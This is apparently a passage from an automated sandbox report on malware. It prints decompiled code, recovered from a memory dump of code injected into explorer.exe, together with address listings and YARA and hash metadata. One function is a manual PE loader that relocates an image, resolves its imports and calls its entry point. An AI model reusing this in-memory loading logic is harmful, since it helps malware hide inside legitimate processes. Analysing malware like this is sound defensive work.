						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                            0x00092d76
                            0x00092d7b
                            0x00092d7f
                            0x00092d82
                            0x00092d82
                            0x00092d85
                            0x00092d8a
                            0x00092d8f
                            0x00092d92
                            0x00092d97
                            0x00092d9a
                            0x00092da0
                            0x00092da0
                            0x00092dab
                            0x00092dae
                            0x00092db5
                            0x00092dba
                            0x00000000
                            0x00000000
                            0x00092dc0
                            0x00092dc5
                            0x00092dc5
                            0x00092dca
                            0x00092dd0
                            0x00092dda
                            0x00092ddf
                            0x00092de5
                            0x00092e04
                            0x00092e07
                            0x00092e12
                            0x00092e12
                            0x00092e12
                            0x00092e09
                            0x00092e09
                            0x00092e0b
                            0x00000000
                            0x00092e0d
                            0x00092e0d
                            0x00092e0d
                            0x00092e0b
                            0x00092e1a
                            0x00092e1f
                            0x00092e24
                            0x00092e2a
                            0x00092e2e
                            0x00092e31
                            0x00092e34
                            0x00092e3a
                            0x00092e3f
                            0x00092e42
                            0x00092e48
                            0x00092e4d
                            0x00092e53
                            0x00092e59
                            0x00092e5e
                            0x00092e61
                            0x00092e66
                            0x00092e6a
                            0x00092e6e
                            0x00092e71
                            0x00092e74
                            0x00092e7d
                            0x00092e84
                            0x00092e87
                            0x00092e8a
                            0x00092e8f
                            0x00092e94
                            0x00092e97
                            0x00092e9a
                            0x00092e9a
                            0x00092e9e
                            0x00092ea7
                            0x00092eae
                            0x00092eb1
                            0x00092eb6
                            0x00092ebb
                            0x00092ebb
                            0x00092ebe
                            0x00092ec3
                            0x00000000
                            0x00000000
                            0x00092de7
                            0x00092de9
                            0x00092df6
                            0x00000000
                            0x00000000
                            0x00092df6
                            0x00092de9
                            0x00000000
                            0x00092de5
                            0x00092ec9
                            0x00092ece
                            0x00092ed1
                            0x00092ed4
                            0x00092f7f
                            0x00092f7f
                            0x00092eda
                            0x00092eda
                            0x00092eda
                            0x00092edf
                            0x00092f09
                            0x00092f0c
                            0x00092f0c
                            0x00092f11
                            0x00092f13
                            0x00092f15
                            0x00092f18
                            0x00092f1b
                            0x00092f23
                            0x00092f28
                            0x00092f28
                            0x00092f2e
                            0x00092f31
                            0x00092f34
                            0x00092f37
                            0x00092f39
                            0x00092f39
                            0x00092f3a
                            0x00092f3a
                            0x00092f37
                            0x00092f48
                            0x00092f4b
                            0x00092f4f
                            0x00092f54
                            0x00092f57
                            0x00092f5a
                            0x00092f5a
                            0x00092f5a
                            0x00092f5d
                            0x00092f5d
                            0x00092f60
                            0x00092f60
                            0x00092ee1
                            0x00092ee1
                            0x00092ef1
                            0x00092ef4
                            0x00092ef9
                            0x00092ef9
                            0x00092efc
                            0x00092eff
                            0x00092f02
                            0x00092f04
                            0x00092f04
                            0x00092f63
                            0x00092f65
                            0x00092f68
                            0x00092f68
                            0x00092f6e
                            0x00092f72
                            0x00092f75
                            0x00092f77
                            0x00092f77
                            0x00092f88
                            0x00092f8a
                            0x00092f8a
                            0x00092f92
                            0x00092fa0
                            0x00092fa3
                            0x00092fa5
                            0x00092fc5
                            0x00092fc5
                            0x00092fc8
                            0x00092fce
                            0x00092fcf
                            0x00092fd2
                            0x00092fd4
                            0x00092fd7
                            0x00092fda
                            0x00092fdd
                            0x00092fe1
                            0x00092fe4
                            0x00092fe7
                            0x00092fea
                            0x00092fec
                            0x00092fec
                            0x00092fef
                            0x00092ff1
                            0x00092ff1
                            0x00092ff4
                            0x00092ff6
                            0x00092ff9
                            0x00093001
                            0x00093004
                            0x00093009
                            0x00093009
                            0x0009300f
                            0x00093012
                            0x00093015
                            0x00093017
                            0x00093017
                            0x00093018
                            0x00093018
                            0x00093023
                            0x00093023
                            0x00093023
                            0x00093026
                            0x00093029
                            0x00093029
                            0x0009302c
                            0x0009302c
                            0x00092fef
                            0x0009302f
                            0x00093032
                            0x00093035
                            0x00093037
                            0x0009303a
                            0x0009303c
                            0x0009303f
                            0x00093042
                            0x00093044
                            0x00093047
                            0x0009304f
                            0x00093057
                            0x0009305a
                            0x0009305a
                            0x0009305a
                            0x0009305d
                            0x0009305d
                            0x0009305d
                            0x00093060
                            0x00093066
                            0x00093068
                            0x00093068
                            0x0009306e
                            0x00093074
                            0x0009307d
                            0x00093084
                            0x00093086
                            0x00093089
                            0x00093089
                            0x0009308c
                            0x0009308c
                            0x0009308f
                            0x00093091
                            0x00093094
                            0x00093096
                            0x000930b1
                            0x000930b1
                            0x000930b5
                            0x000930b8
                            0x000930bb
                            0x000930be
                            0x000930d4
                            0x000930d4
                            0x000930d4
                            0x000930c0
                            0x000930c0
                            0x000930c2
                            0x000930c6
                            0x000930c9
                            0x00000000
                            0x000930cb
                            0x000930cb
                            0x000930cd
                            0x00000000
                            0x000930cf
                            0x000930cf
                            0x000930cf
                            0x000930cd
                            0x000930c9
                            0x000930d8
                            0x000930db
                            0x000930e0
                            0x000930ea
                            0x000930ea
                            0x000930ea
                            0x000930ed
                            0x00093098
                            0x00093098
                            0x0009309a
                            0x000930a1
                            0x000930a1
                            0x000930a3
                            0x000930a5
                            0x000930a7
                            0x000930ab
                            0x000930ad
                            0x000930af
                            0x00000000
                            0x00000000
                            0x000930af
                            0x000930ab
                            0x0009309c
                            0x0009309c
                            0x0009309f
                            0x00000000
                            0x00000000
                            0x0009309f
                            0x0009309a
                            0x000930f7
                            0x000930f9
                            0x000930f9
                            0x00093104
                            0x00092fa7
                            0x00092fa7
                            0x00092faa
                            0x00000000
                            0x00092fac
                            0x00092fac
                            0x00092fae
                            0x00092fb2
                            0x00000000
                            0x00092fb4
                            0x00092fb4
                            0x00092fb4
                            0x00092fb7
                            0x00000000
                            0x00092fbb
                            0x00092fc4
                            0x00092fc4
                            0x00092fb7
                            0x00092fb2
                            0x00092faa
                            0x00092f96
                            0x00092f9f
                            0x00092f9f

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 52%
                            			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                            0x00092afb
                            0x00092b01
                            0x00092b0a
                            0x00092b0d
                            0x00092b10
                            0x00000000
                            0x00092c01
                            0x00092c05
                            0x00092c07
                            0x00092c15
                            0x00092d33
                            0x00092d3c
                            0x00092d3f
                            0x00092d43
                            0x00092d49
                            0x00092d51
                            0x00092d51
                            0x00092d59
                            0x00000000
                            0x00092d64
                            0x00092c1b
                            0x00092c24
                            0x00092c32
                            0x00092c35
                            0x00092c52
                            0x00092c59
                            0x00092c6b
                            0x00092c6b
                            0x00092c72
                            0x00092c82
                            0x00092c9a
                            0x00092c84
                            0x00092c8c
                            0x00092c8c
                            0x00092c9d
                            0x00092ca1
                            0x00092cb1
                            0x00092cd4
                            0x00092ce6
                            0x00092cb3
                            0x00092cc7
                            0x00092cc7
                            0x00092cf0
                            0x00092d0c
                            0x00092cf2
                            0x00092d01
                            0x00092d01
                            0x00092d14
                            0x00092d1d
                            0x00092d1d
                            0x00092d2b
                            0x00000000
                            0x00092c74
                            0x00092c76
                            0x00000000
                            0x00092c76
                            0x00092c72
                            0x00000000
                            0x00092c35
                            0x00092b18
                            0x00092b26
                            0x00092b2b
                            0x00092b36
                            0x00092b39
                            0x00092b3d
                            0x00092b3f
                            0x00092b4f
                            0x00092b58
                            0x00092b61
                            0x00092b69
                            0x00092b72
                            0x00092b7d
                            0x00092b83
                            0x00092b86
                            0x00092b89
                            0x00092b90
                            0x00092b97
                            0x00000000
                            0x00000000
                            0x00092ba2
                            0x00092bb0
                            0x00092bbb
                            0x00092bc5
                            0x00092bdd
                            0x00092bea
                            0x00092bea
                            0x00092bc7
                            0x00092bd2
                            0x00092bd2
                            0x00092bf1
                            0x00092bf1
                            0x00092bf9
                            0x00092bf9
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                            • LoadLibraryA.KERNEL32(?), ref: 00092C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                            • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1e8
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0xc2f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1e8
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0xc2fd78
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1e8
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                            0x00081c68
                            0x00081c75
                            0x00081c77
                            0x00081c7e
                            0x00081ce4
                            0x00081c8b
                            0x00081c90
                            0x00081c96
                            0x00081c9b
                            0x00081ca1
                            0x00081ca3
                            0x00081ca7
                            0x00081d15
                            0x00081d17
                            0x00081d99
                            0x00081d9f
                            0x00081d9f
                            0x00081ca9
                            0x00081cb1
                            0x00081cb1
                            0x00081cbd
                            0x00081cc3
                            0x00081cc5
                            0x00000000
                            0x00000000
                            0x00081cc7
                            0x00081cd1
                            0x00081cd7
                            0x00081cdd
                            0x00081cdf
                            0x00000000
                            0x00081cdf
                            0x00081cab
                            0x00081caf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00081caf
                            0x00081cee
                            0x00081cef
                            0x00081cf0
                            0x00081cf1
                            0x00081cf2
                            0x00081cf7
                            0x00081d01
                            0x00081d06
                            0x00081d0e
                            0x00081d29
                            0x00081d2c
                            0x00081d36
                            0x00081d41
                            0x00081d54
                            0x00081d56
                            0x00081d58
                            0x00081d5a
                            0x00081d5b
                            0x00081d63
                            0x00081d64
                            0x00081d6a
                            0x00081d10
                            0x00081d10
                            0x00081d10
                            0x00081d6b
                            0x00081d76
                            0x00081d79
                            0x00081d7f
                            0x00081d85
                            0x00081d90
                            0x00081d97
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                            • Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1e4
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0xc2f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0xc2f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1e4
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0xc2fd78
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1e4
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                            0x00081b2d
                            0x00081b33
                            0x00081b41
                            0x00081baf
                            0x00081b4e
                            0x00081b53
                            0x00081b59
                            0x00081b5e
                            0x00081b64
                            0x00081b66
                            0x00081b6a
                            0x00081c64
                            0x00081c64
                            0x00081b70
                            0x00081b70
                            0x00081b7c
                            0x00081b7c
                            0x00081b88
                            0x00081b8e
                            0x00081b90
                            0x00000000
                            0x00081b92
                            0x00081b92
                            0x00081b9c
                            0x00081ba2
                            0x00081ba8
                            0x00081baa
                            0x00000000
                            0x00081baa
                            0x00081b72
                            0x00081b72
                            0x00081b76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00081b76
                            0x00081b70
                            0x00081c5d
                            0x00081c63
                            0x00081c63
                            0x00081bb8
                            0x00081bcc
                            0x00081bcf
                            0x00081bd9
                            0x00081be5
                            0x00081bef
                            0x00081bf0
                            0x00081bf1
                            0x00081bf2
                            0x00081bf7
                            0x00081c00
                            0x00081c04
                            0x00081c06
                            0x00081c07
                            0x00081c0f
                            0x00081c10
                            0x00081c16
                            0x00081c1b
                            0x00081c21
                            0x00081c21
                            0x00081c26
                            0x00081c31
                            0x00081c34
                            0x00081c3c
                            0x00081c48
                            0x00081c4b
                            0x00081c51
                            0x00081c56
                            0x00081c5b
                            0x00000000

                            APIs
                            • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                            • DuplicateHandle.KERNEL32 ref: 00081BD9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                            • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%